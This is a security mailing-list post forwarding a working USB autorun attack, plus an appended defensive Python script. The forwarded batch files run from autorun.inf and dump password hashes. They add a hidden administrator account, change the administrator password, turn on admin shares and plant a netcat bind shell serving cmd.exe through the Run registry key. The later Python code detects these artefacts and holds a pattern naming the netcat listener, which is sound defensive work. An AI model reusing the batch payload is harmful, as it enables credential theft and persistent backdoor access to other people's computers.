
[Full-Disclosure] USB risks - working autorun example (fwd from pen-test)



Okay, just to put this point at ease, autorun.inf usage on USB drives is possible. My concerns are of a different type, a BOF or a backdoor in an SDK. Even simple usage of USB for different operational criminal needs...
Still, if the simplest solution (autorun) works (and it does...)... why over-complicate like we in the security field tend to do?


Attached is a proof-of-concept as made available by mak_pen@xxxxxxxxxxx for using autorun with USB.

This should work. As it was already released, I see nothing wrong with relaying it again (with due credit) here.

I'd strongly suggest that people read the (different) threads on the subject on the pen-test list; a lot of questions were answered there.

Gadi Evron.

--
Email: ge@xxxxxxxxxxxxx  Work: gadie@xxxxxxxxxxx Backup: ge@xxxxxxxxxxx
Phone: +972-50-428610 (Cell).

PGP key for attachments: http://vapid.reprehensible.net/~ge/Gadi_Evron.asc
ID: 0xD9216A06 FP: 5BB0 D3E2 D3C1 19B7 2104 C0D0 A7B3 1CF7 D921 6A06
GPG key for encrypted email: http://vapid.reprehensible.net/~ge/Gadi_Evron_Emails.asc
ID: 0x06C7D450 FP: 3B88 845A DF1F 4062 E5BA 569A A87E 8DB7 06C7 D450
--- Begin Message ---
In-Reply-To: <BAY15-F11d7KKQpQq5p00043ca6@xxxxxxxxxxx>

I have been using this "attack" for some time now. Below are the batch files (test.bat, b.bat and autorun.inf; autorun.inf calls test.bat) I use:



*********<BOF test.bat>
@echo off
@start /min b.bat /B
@exit
<EOF test.bat>

*********<BOF b.bat>
@explorer .
@echo off

::Displaying Computer Information for my reference
@echo %computername% %username% %date% %time% >> Essential\DumpIt\sam.txt
@Essential\DumpIt\pwdump2 >> Essential\DumpIt\sam.txt

::Adding a user for me :o)
@net user /add __system32__ .z,xmcnvb /fullname:"IPC User"
@net localgroup Administrators _system32_ /add

::Hide the Account from being shown on the welcome screen
@reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "__system__" /t REG_DWORD /d 0 /f

::Enabling Admin Shares
@reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters /v @AutoSharewks /t reg_dword /d 1 /f

::Changing Admin Password
@net user administrator .;[pl,mkoijnbhu

::Backdooring
@copy nc.exe <nc directory>
@cd c:
@cd <nc directory>
@reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Taskbr" /d "nc directory\nc.exe -L -d -p 80 -e cmd.exe" /f

@echo MYUSER: __system32__ .z,xmcnvb >> Essential\DumpIt\sam.txt
@echo Changed Admin Pass: .;[pl,mkoijnbhu >> Essential\DumpIt\sam.txt
@echo ******************************************** >> Essential\DumpIt\sam.txt
@cls
@exit
<EOF b.bat>



I have tried this using a flash memory and it works. What happens is that it opens explorer showing the current directory so that it hides any shells that might appear, then it does a series of commands which I have documented above.



To prevent this I have a registry file I use to disable autorun altogether. Contact me if you need it at: mak_pen(at)hotmail(dot)com



Cheers....





>From: "Fred Gravel" <mindedsmasher@xxxxxxxxxxx>

>To: pen-test@xxxxxxxxxxxxxxxxx

>Subject: Re: USB delivered attacks

>Date: Wed, 02 Jun 2004 20:02:14 +0000

>Message-ID: <BAY15-F11d7KKQpQq5p00043ca6@xxxxxxxxxxx>


>

>And after some search ... autorun is possible on a usb storage device... as explained just below ...
>
>http://www.microsoft.com/whdc/device/storage/usbfaq.mspx
>Q: What must I do to trigger Autorun on my USB storage device?
>If you need to make a USB storage device that executes Autorun, the following two conditions must both be true:
>
>- Media must be marked as removable.
>- The device can be set to either static or removable.
>
>We associate the "removable" nature of a device with the bus that it resides on. This means that a disk on an Integrated Device Electronics (IDE) or SCSI bus would be considered fixed, whereas a disk on a USB or IEEE 1394 bus would be regarded as removable by default. PnP uses a bit in the DEVICE_CAPABILITIES structure to determine this. For more information, see the DEVICE_CAPABILITIES Plug and Play Structure in the Windows DDK, located at
>http://msdn.microsoft.com/library/default.asp?url=/library/en-us/kmarch/hh/kmarch/k112_22r6.asp.
>
>The "removable" nature of media is a property of the device. For example, in the case of a CD-ROM or a ZIP drive, the medium can be removed without the device itself going away, but on the other hand the medium and the disk cannot be separated on static storage PC cards. We obtain this information by using the StorageDeviceProperty request. For more information, see the STORAGE_DEVICE_DESCRIPTOR Storage Structure in the Windows DDK, located at
>http://msdn.microsoft.com/library/en-us/storage/hh/storage/k306_00qa.asp.
>
>----
>Also the autorun could be used in "cooperation" of the desktop.ini file included in the folder(s) on the usb storage device if needed...





--- End Message ---
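A defender's triage of the host artefacts b.bat leaves behind (the Run-key listener, the account hidden via SpecialAccounts\UserList, AutoShareWks) together with a check of the Explorer policy value that a "disable autorun" registry file like the one mentioned above would set. This is an added example, not code from either post: the .reg text is a constructed sample shaped like `reg export` output for the keys b.bat touches, the value names and data are invented, and NoDriveTypeAutoRun is a real Explorer policy value that the thread itself does not name.

```python
import re

# Constructed sample shaped like `reg export` output for the keys b.bat touches, plus the
# Explorer policy key that governs AutoRun (all value data invented for this example).
SAMPLE_REG = r"""Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Taskbr"="C:\\tools\\nc.exe -L -d -p 80 -e cmd.exe"
"Updater"="C:\\Program Files\\Vendor\\updater.exe /background"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
"__system__"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]
"AutoShareWks"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoDriveTypeAutoRun"=dword:00000091
"""

# netcat-style listener that hands callers a shell: "-L"/"-l" ... "-e cmd.exe"
LISTENER = re.compile(r"\s-l\s.*\s-e\s+\S*cmd\.exe", re.IGNORECASE)

def parse_reg(text):
    """Return {key_path: {value_name: data}} from .reg text; string quotes are stripped."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
        elif current and line.startswith('"'):
            name, _, data = line.partition("=")
            keys[current][name.strip('"')] = data.strip('"')
    return keys

def findings(keys):
    """(rule, key_path, value_name) for each b.bat artefact and for a weak AutoRun policy."""
    hits = []
    for path, values in keys.items():
        p = path.lower()
        for name, data in values.items():
            if p.endswith(r"\currentversion\run") and LISTENER.search(data):
                hits.append(("run-key bind shell", path, name))
            elif p.endswith(r"\specialaccounts\userlist") and data == "dword:00000000":
                hits.append(("account hidden from logon screen", path, name))
            elif p.endswith(r"\lanmanserver\parameters") and name.lower() == "autosharewks":
                hits.append(("admin shares forced on", path, name))
            elif name.lower() == "nodrivetypeautorun" and data.lower() != "dword:000000ff":
                hits.append(("AutoRun not disabled for all drive types (0xFF)", path, name))
    return hits
```

Run it against a real `reg export` of those four keys; a clean host yields no hits except, on older defaults, the AutoRun policy line.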